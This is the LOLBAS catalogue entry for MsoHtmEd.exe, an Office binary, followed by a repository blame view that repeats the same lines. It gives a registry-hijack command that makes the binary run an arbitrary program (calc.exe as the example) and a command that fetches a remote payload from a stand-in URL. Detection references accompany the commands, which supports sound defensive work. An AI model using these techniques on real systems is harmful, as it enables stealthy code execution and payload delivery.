LOLBAS/yml/OtherMSBinaries/MsoHtmEd.yml

---
Name: MsoHtmEd.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
    Description: Execute a command line from the registry
    Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
  - Command: MsoHtmEd.exe https://example.com/payload
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
  - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
  - IOC: Suspicious Office application internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 18:13:56 +07:00			`---`
			`Name: MsoHtmEd.exe`
			`Description: Microsoft Office component`
			`Author: Nir Chako`
			`Created: 2022-07-24`
			`Commands:`
Update MsoHtmEd.yml 2023-05-07 14:25:29 +07:00			`- Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com`
			`Description: Execute a command line from the registry`
			`Usecase: Set this registry key with the desired commaned you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"`
			`Category: Execute`
			`Privileges: User`
			`MitreID: T1218`
			`OperatingSystem: Windows 10, Windows 11`
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 18:13:56 +07:00			`- Command: MsoHtmEd.exe https://example.com/payload`
			`Description: Downloads payload from remote server`
			`Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`OperatingSystem: Windows 10, Windows 11`
			`Full_Path:`
			`- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe`
			`- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe`
			`Detection:`
$frack113$ Add sigma ref Detection (#272) * Add sigma ref * Add missing sigma ref * Fix sigma link * Remove by Defender * Remove by Defender 2022-12-29 15:51:15 +01:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml`
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 18:13:56 +07:00			`- IOC: Suspicious Office application internet/network traffic`
			`Acknowledgement:`
			`- Person: Nir Chako (Pentera)`
			`Handle: '@C_h4ck_0'`